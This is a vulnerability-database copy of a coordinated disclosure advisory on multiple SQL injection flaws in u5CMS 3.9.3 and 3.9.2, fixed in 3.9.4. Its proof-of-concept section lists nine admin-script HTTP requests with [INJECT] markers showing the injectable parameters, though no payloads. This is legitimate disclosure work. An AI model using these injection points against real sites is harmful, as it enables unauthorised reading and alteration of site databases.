Lucene search

K
zeroscienceGjoko KrsticZSL-2015-5225
HistoryFeb 09, 2015 - 12:00 a.m.

u5CMS 3.9.3 Multiple SQL Injection Vulnerabilities

2015-02-0900:00:00
Gjoko Krstic
zeroscience.mk
31

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

7.9 High

AI Score

Confidence

Low

0.001 Low

EPSS

Percentile

46.6%

Title: u5CMS 3.9.3 Multiple SQL Injection Vulnerabilities
Advisory ID: ZSL-2015-5225
Type: Local/Remote
Impact: Exposure of System Information, Exposure of Sensitive Information, Manipulation of Data
Risk: (3/5)
Release Date: 09.02.2015

Summary

u5CMS is a little, handy Content Management System for medium-sized websites, conference / congress / submission administration, review processes, personalized serial mails, PayPal payments and online surveys based on PHP and MySQL and Apache.

Description

Input passed via multiple parameters in multiple scripts is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Vendor

Stefan P. Minder - <http://www.yuba.ch>

Affected Version

3.9.3 and 3.9.2

Tested On

Apache 2.4.10 (Win32)
PHP 5.6.3
MySQL 5.6.21

Vendor Status

[29.12.2014] Vulnerabilities discovered.
[04.02.2015] Contact with the vendor.
[04.02.2015] Vendor replies asking more details.
[05.02.2015] Sent details to the vendor.
[06.02.2015] Vendor releases version 3.9.4 to address these issues.
[09.02.2015] Coordinated public security advisory released.

PoC

u5cms_sqli.txt

Credits

Vulnerability discovered by Gjoko Krstic - <[email protected]>

References

[1] http://yuba.ch/index.php?c=u5cms&l=en
[2] <http://www.exploit-db.com/exploits/36027&gt;
[3] <http://cxsecurity.com/issue/WLB-2015020037&gt;
[4] <http://packetstormsecurity.com/files/130326&gt;
[5] <http://osvdb.org/show/osvdb/118114&gt;
[5] <http://osvdb.org/show/osvdb/118113&gt;
[6] <http://osvdb.org/show/osvdb/118112&gt;
[7] <http://osvdb.org/show/osvdb/118111&gt;
[8] <http://osvdb.org/show/osvdb/118110&gt;
[9] <http://osvdb.org/show/osvdb/118109&gt;
[10] <http://osvdb.org/show/osvdb/118108&gt;
[11] <http://osvdb.org/show/osvdb/118105&gt;
[12] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1576&gt;
[13] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2015-1576&gt;
[14] <https://exchange.xforce.ibmcloud.com/#/vulnerabilities/100816&gt;

Changelog

[09.02.2015] - Initial release
[11.02.2015] - Added reference [2], [3], [4], [5], [6], [7], [8], [9], [10] and [11]
[12.02.2015] - Added reference [12] and [13]
[13.03.2015] - Added reference [14]

Contact

Zero Science Lab

Web: <http://www.zeroscience.mk>
e-mail: [email protected]

<html><body><p>u5CMS 3.9.3 Multiple SQL Injection Vulnerabilities


Vendor: Stefan P. Minder
Product web page: http://www.yuba.ch
Affected version: 3.9.3 and 3.9.2

Summary: u5CMS is a little, handy Content Management System for medium-sized
websites, conference / congress / submission administration, review processes,
personalized serial mails, PayPal payments and online surveys based on PHP and
MySQL and Apache.

Desc: Input passed via multiple parameters in multiple scripts is not properly
sanitised before being used in SQL queries. This can be exploited to manipulate
SQL queries by injecting arbitrary SQL code.

Tested on: Apache 2.4.10 (Win32)
           PHP 5.6.3
           MySQL 5.6.21


Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                              @zeroscience


Advisory ID: ZSL-2015-5225
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5225.php


29.12.2014

---


1. POST /u5cms/u5admin/copy2.php?name=album HTTP/1.1

   name=album[INJECT]


2. GET /u5cms/u5admin/editor.php?c=start[INJECT] HTTP/1.1


3. GET /u5cms/u5admin/localize.php?name=album[INJECT] HTTP/1.1


4. POST /u5cms/u5admin/meta2.php?typ=a[INJECT]&amp;uri=metai.php HTTP/1.1


5. GET /u5cms/u5admin/metai.php?typ=a&amp;name=album[INJECT] HTTP/1.1


6. GET /u5cms/u5admin/nc.php?name=o[INJECT] HTTP/1.1


7. POST /u5cms/u5admin/new2.php?typ=e HTTP/1.1

   name=test[INJECT]&amp;typ=e


8. POST /u5cms/u5admin/rename2.php?name=album HTTP/1.1

   name=album2[INJECT]&amp;ulinks=yes


9. GET /u5cms/u5admin/rename2.php?name=valbum&amp;newname=valbum2[INJECT]&amp;typ=a HTTP/1.1
</p></body></html>

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

7.9 High

AI Score

Confidence

Low

0.001 Low

EPSS

Percentile

46.6%

Related for ZSL-2015-5225